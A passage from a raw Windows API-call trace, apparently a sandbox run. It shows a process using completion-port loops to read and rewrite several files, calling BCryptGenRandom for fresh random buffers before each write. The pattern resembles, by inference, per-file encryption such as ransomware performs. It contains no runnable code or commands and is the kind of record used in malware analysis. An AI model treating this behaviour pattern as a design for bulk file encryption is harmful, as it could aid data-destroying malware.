(hObject=0x3cc) returned 1 [0154.444] free (_Block=0x3e70008) [0154.444] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.454] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2eb4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0154.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.469] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.470] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0154.470] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.470] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0154.470] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.471] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.471] free (_Block=0x3e305b8) [0154.471] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.471] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.471] free (_Block=0x1fa91d0) [0154.471] free (_Block=0x1fa2ed8) [0154.471] free (_Block=0x1fa90b8) [0154.471] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0154.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.478] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3550, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.485] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x2210, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0154.491] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.580] CloseHandle (hObject=0x338) returned 1 [0154.580] free (_Block=0x3df0008) [0154.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.596] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x9320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.613] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x80e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0154.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.623] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0xc6e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0154.625] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.639] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xcd10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0154.639] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.652] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xa810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0154.652] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0154.668] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x89a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0155.239] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x43d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0155.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0155.354] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x20f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0155.354] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0157.919] CloseHandle (hObject=0x308) returned 1 [0157.919] free (_Block=0x3df0008) [0157.920] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0157.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0157.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.934] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0157.934] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0157.934] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0157.934] free (_Block=0x3e305b8) [0157.934] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0157.934] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0157.935] free (_Block=0x1fa91d0) [0157.935] free (_Block=0x1fa2ed8) [0157.935] free (_Block=0x1fa90b8) [0157.935] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0157.935] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0157.944] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5450, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0157.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0157.952] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x81f0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0158.906] CloseHandle (hObject=0x170) returned 1 [0158.906] free (_Block=0x1ff1e60) [0158.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0158.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0158.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.919] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0158.919] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0158.919] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0158.919] free (_Block=0x3e305b8) [0158.919] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0158.919] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0158.920] free (_Block=0x1fa91d0) [0158.920] free (_Block=0x1fa2ed8) [0158.920] free (_Block=0x1fa90b8) [0158.920] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0158.920] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0158.927] CloseHandle (hObject=0x308) returned 1 [0158.928] free (_Block=0x3d70450) [0158.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0158.936] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3260, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0158.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.080] CloseHandle (hObject=0x2a8) returned 1 [0159.080] free (_Block=0x1ff1e60) [0159.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.088] CloseHandle (hObject=0x308) returned 1 [0159.089] free (_Block=0x3d70450) [0159.089] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.101] CloseHandle (hObject=0x170) returned 1 [0159.101] free (_Block=0x3f70048) [0159.101] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.120] CloseHandle (hObject=0x3cc) returned 1 [0159.120] free (_Block=0x3df0008) [0159.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.124] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x6aa8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0159.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.125] CloseHandle (hObject=0x308) returned 1 [0159.126] free (_Block=0x3d70450) [0159.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.128] CloseHandle (hObject=0x338) returned 1 [0159.128] free (_Block=0x3e70008) [0159.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.130] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x6873, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0159.131] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.132] CloseHandle (hObject=0x170) returned 1 [0159.132] free (_Block=0x3f70048) [0159.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0159.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0159.186] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.186] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.186] free (_Block=0x3e305b8) [0159.186] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.186] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.186] free (_Block=0x1fa91d0) [0159.186] free (_Block=0x1fa2ed8) [0159.186] free (_Block=0x1fa90b8) [0159.186] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0159.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.193] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.194] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0159.194] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.195] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0159.195] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.195] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.195] free (_Block=0x3e305b8) [0159.195] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.195] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.196] free (_Block=0x1fa91d0) [0159.196] free (_Block=0x1fa2ed8) [0159.196] free (_Block=0x1fa90b8) [0159.196] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.196] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.209] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa4a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0159.209] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.219] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3615, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0159.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.270] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x2026, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0159.285] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.295] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3d7f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.305] CloseHandle (hObject=0x338) returned 1 [0159.305] free (_Block=0x1ff1e60) [0159.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.306] CloseHandle (hObject=0x3cc) returned 1 [0159.306] free (_Block=0x3e70008) [0159.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.333] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0159.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.358] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x49ba, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0159.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 